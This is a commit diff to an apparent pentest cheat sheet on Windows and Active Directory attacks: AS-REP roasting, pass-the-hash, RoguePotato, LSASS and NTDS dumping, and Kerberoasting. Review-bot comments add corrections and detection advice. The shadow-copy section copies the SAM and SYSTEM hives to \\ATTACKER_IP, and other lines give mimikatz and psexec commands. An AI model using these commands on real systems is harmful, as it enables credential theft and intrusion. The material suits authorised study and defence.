more info
This commit is contained in:
parent
ccaa96dab5
commit
c78967a9a9
|
|
@ -1,4 +1,10 @@
|
||||||
# AS-Rep Roating
|
# AS-Rep Roasting
|
||||||
|
|
||||||
|
AS-REP Roasting targets account for which preauthentication is disabled.
|
||||||
|
This means `DONT_REQUIRE_PREAUTH` for an account is enabled, and the DC skips
|
||||||
|
the verification step. After event type `4768` the `Pre_Authentication_Type=0`
|
||||||
|
and event code `4769` and `4624` is never triggered.
|
||||||
|
A service can be requested without any password check.
|
||||||
|
|
||||||
AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
|
AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
|
||||||
This is somewhat similar to Kerberoasting but includes user accounts as well.
|
This is somewhat similar to Kerberoasting but includes user accounts as well.
|
||||||
|
|
|
||||||
|
|
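Review bot: the new sentence "A service can be requested without any password check" misstates what AS-REP roasting yields: with DONT_REQUIRE_PREAUTH set the KDC answers an AS-REQ for that user with an AS-REP whose encrypted part is keyed from the user's password hash, so the attacker obtains material to crack offline, not a service ticket; a TGS (4769) and a logon (4624) only follow once the password has been recovered, which is exactly why the added detection clue (a 4768 with Pre-Authentication Type 0 and no subsequent 4769/4624 for that account) works. Suggest "The AS-REP can be obtained without any password check and cracked offline". Also "targets account" should be "targets accounts", and the 4768 field is named "Pre-Authentication Type", not `Pre_Authentication_Type`. A mitigation line fits here: audit for the flag (userAccountControl bit 0x400000) and clear it on every account that does not strictly need it.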
@ -27,6 +27,7 @@ Get-WinEvent -FilterHashTable @{LogName='<Category>';ID='<Event IDs>'} | fl
|
||||||
|
|
||||||
* **1**: Process Creation (Applications & Services -> Microsoft -> Windows ->
|
* **1**: Process Creation (Applications & Services -> Microsoft -> Windows ->
|
||||||
Sysmon -> Operational)
|
Sysmon -> Operational)
|
||||||
|
* **10**: ProcessAccess, Sysmon event where one process opens a handle to another process
|
||||||
* **4688**: Process Creation (Windows Logs -> Security)
|
* **4688**: Process Creation (Windows Logs -> Security)
|
||||||
|
|
||||||
### Files
|
### Files
|
||||||
|
|
|
||||||
|
|
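Review bot: the added event 10 entry is the one that matters for the LSASS section later in this file, so say so: Sysmon ProcessAccess records SourceImage, TargetImage and GrantedAccess of the handle, and a TargetImage of lsass.exe from anything other than the usual system processes is the standard signal for a credential dump attempt. Suggest "ProcessAccess, Sysmon event where one process opens a handle to another process (watch for TargetImage lsass.exe)". Minor: the two Process Creation entries give the channel path in parentheses; the new line should follow the same pattern for consistency.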
@ -145,7 +145,7 @@ sc start TheService
|
||||||
|
|
||||||
### Startup Application
|
### Startup Application
|
||||||
|
|
||||||
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`
|
* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`
|
||||||
|
|
||||||
### Password Mining
|
### Password Mining
|
||||||
|
|
||||||
|
|
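Review bot: no textual change is visible in this hunk (old and new sides render identically), so it looks like a whitespace-only edit; trailing-whitespace cleanup is better kept out of a commit titled "more info". While here, the Startup bullet reads awkwardly: "Put a reverse shell executable inside ..." is what is meant, and a defender note that the contents of this folder belong in baseline file monitoring would round it out.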
@ -184,7 +184,7 @@ C:\inetpub\wwwroot\web.config
|
||||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
|
||||||
```
|
```
|
||||||
|
|
||||||
### Putty
|
### Putty
|
||||||
|
|
||||||
* Saved proxy password credentials may be found via
|
* Saved proxy password credentials may be found via
|
||||||
```sh
|
```sh
|
||||||
|
|
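Review bot: whitespace-only hunk again as rendered. The heading should be "PuTTY" (the project's own capitalisation), and the bullet "Saved proxy password credentials may be found via" is cut off before the fence; complete the sentence (e.g. "... may be found in the saved-session registry keys via") so it reads on its own. Suggest adding the mitigation alongside it: PuTTY stores a saved session's proxy password in clear text, so the fix is not to save the password in the session at all.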
@ -294,7 +294,7 @@ secretsdump.py -sam sam.hive -system system.hive LOCAL
|
||||||
hashdump
|
hashdump
|
||||||
```
|
```
|
||||||
|
|
||||||
* Use pass the hash to login
|
* Use pass the hash to login
|
||||||
```sh
|
```sh
|
||||||
psexec.py -hashes <hash> administrator@$TARGET_IP
|
psexec.py -hashes <hash> administrator@$TARGET_IP
|
||||||
```
|
```
|
||||||
|
|
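Review bot: `-hashes <hash>` hides the format impacket expects, which is `LMHASH:NTHASH` (the LM half may be left empty, e.g. `:NTHASH`); write the placeholder as `-hashes <LMHASH:NTHASH>` so the secretsdump output from the preceding block is pasted correctly. The hunk itself shows no textual change, so it is presumably whitespace.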
@ -314,7 +314,7 @@ copy cmd.exe utilman.exe
|
||||||
* It is a rouge potato
|
* It is a rouge potato
|
||||||
* Execute process as another user
|
* Execute process as another user
|
||||||
* Service accounts operate through impersonation
|
* Service accounts operate through impersonation
|
||||||
* Check privileges via `whoami /priv` for these
|
* Check privileges via `whoami /priv` for these
|
||||||
* __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker
|
* __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker
|
||||||
```sh
|
```sh
|
||||||
socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
|
socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
|
||||||
|
|
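Review bot: "rouge potato" should be "rogue potato" (RoguePotato), and the OXID bullet is garbled ("is executed as via DCOM as a resolver"); what it means is that the OXID resolver is the DCOM endpoint listening on TCP 135, and the socat line forwards that port to the attacker host. Suggest: "DCOM resolves an Object Exporter Identifier (OXID) through the OXID resolver on port 135; the listener below forwards that port to the attacker's socket". The privilege bullet should name what `whoami /priv` is being checked for (SeImpersonatePrivilege), since that is also the mitigation lever: service accounts that do not need impersonation should not hold it.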
@ -324,12 +324,14 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
|
||||||
|
|
||||||
### Volume Shadow Copy Service
|
### Volume Shadow Copy Service
|
||||||
|
|
||||||
* Take a look at the volumes at
|
Take a look at the volumes at
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
vssadmin list shadows
|
vssadmin list shadows
|
||||||
```
|
```
|
||||||
|
|
||||||
* Copy `sam` and `system` from the shadow copy
|
Copy `sam` and `system` from the shadow copy
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
||||||
|
|
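Review bot: this hunk drops the leading `* ` from "Take a look at the volumes at" and "Copy `sam` and `system` from the shadow copy" while every other section in the file keeps the bullet in front of its fenced block (e.g. "* Use pass the hash to login"); pick one convention. The destination `\\ATTACKER_IP\` is missing a share name and does not match the `$TARGET_IP` variable style used elsewhere. From the defender side, `vssadmin list shadows` followed by reads of `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy*\windows\system32\config\sam` are the indicators for this technique (Sysmon event 1 for vssadmin.exe, from the event list earlier in the file) and deserve a sentence here.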
@ -337,10 +339,14 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sys
|
||||||
|
|
||||||
### Dump LSASS
|
### Dump LSASS
|
||||||
|
|
||||||
* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile`
|
LSASS contains multiple different credential types like NTLM password hashes,
|
||||||
|
active krb session tickets, plaintext passwords and cached domain credentials.
|
||||||
|
|
||||||
|
* If administrator permissions are gained, a dump file can be created by opening the task manager and right-clicking `lsass.exe` -> `creat dumpfile`
|
||||||
* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
|
* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
|
||||||
|
|
||||||
* Extract the dump via mimikatz
|
* Extract the dump via mimikatz
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
privilege::debug
|
privilege::debug
|
||||||
sekurlsa::logonpasswords
|
sekurlsa::logonpasswords
|
||||||
|
|
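Review bot: "creat dumpfile" survives the move; the Task Manager menu item is "Create dump file", `tskmgr.exe` should be `taskmgr.exe`, and "sysinternal suite" should be "Sysinternals Suite". The new description overstates "plaintext passwords": LSASS only holds them when WDigest caching is enabled, which is off by default since Windows 8.1/Server 2012 R2 (and via KB2871997 on older versions), and Credential Guard keeps NTLM hashes and Kerberos keys out of reach of a dump entirely; the sentence should carry that caveat, and "krb" should be written out as "Kerberos".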
@ -387,7 +393,7 @@ sekurlsa::credman
|
||||||
### Ntdsutil
|
### Ntdsutil
|
||||||
|
|
||||||
* If administrative permissions on the DC have been gained this can be done
|
* If administrative permissions on the DC have been gained this can be done
|
||||||
* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM)
|
* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM)
|
||||||
|
|
||||||
|
|
||||||
#### Locally extracting ntds.dit
|
#### Locally extracting ntds.dit
|
||||||
|
|
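Review bot: "If administrative permissions on the DC have been gained this can be done" has no antecedent for "this" now that it opens the section; reorder so the tool is described first ("Ntdsutil is the built-in tool used to maintain the AD database ...") and the precondition second. The list in the second bullet mixes verbs and nouns ("delete objects, snapshotting, set ..."); make the items parallel. No textual change is visible in the hunk itself, so it appears to be whitespace.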
@ -411,7 +417,7 @@ secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local
|
||||||
|
|
||||||
#### Remotely dumping ntds
|
#### Remotely dumping ntds
|
||||||
|
|
||||||
* Needs the following AD credentials
|
* Needs the following AD credentials
|
||||||
* Replicating Directory Changes
|
* Replicating Directory Changes
|
||||||
* Replicating Directory Changes All
|
* Replicating Directory Changes All
|
||||||
* Replicating Directory Changes in Filtered Set
|
* Replicating Directory Changes in Filtered Set
|
||||||
|
|
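Review bot: "Needs the following AD credentials" is the wrong word; Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes in Filtered Set are extended rights (permissions on the domain object), not credentials, and by default only domain controllers and the built-in administrative groups hold them. Suggest "Needs an account holding the following extended rights on the domain object". A defender note fits here: a DC logs event 4662 naming these rights when an account performs replication, and a 4662 of that kind from anything that is not a domain controller is the standard DCSync detection.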
@ -469,7 +475,7 @@ net user <GroupMemberUsername>
|
||||||
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user>
|
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user>
|
||||||
```
|
```
|
||||||
|
|
||||||
* Take a look at `Name` in the output and use it to query a TGS ticket
|
* Take a look at `Name` in the output and use it to query a TGS ticket
|
||||||
```sh
|
```sh
|
||||||
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user> -request-user <SPN>
|
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user> -request-user <SPN>
|
||||||
```
|
```
|
||||||
|
|
|
||||||
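Review bot: `-request-user <SPN>` is misleading; impacket's GetUserSPNs.py `-request-user` takes the account name (the `Name` column of the first command's output, i.e. the sAMAccountName), not the SPN string. Change the placeholder to `<username>` and say so in the bullet. On the DC the request shows up as event 4769; a 4769 with encryption type 0x17 (RC4) for a service account is the usual detection, and the mitigations are long random passwords or gMSAs for SPN-bearing accounts and AES-only encryption types.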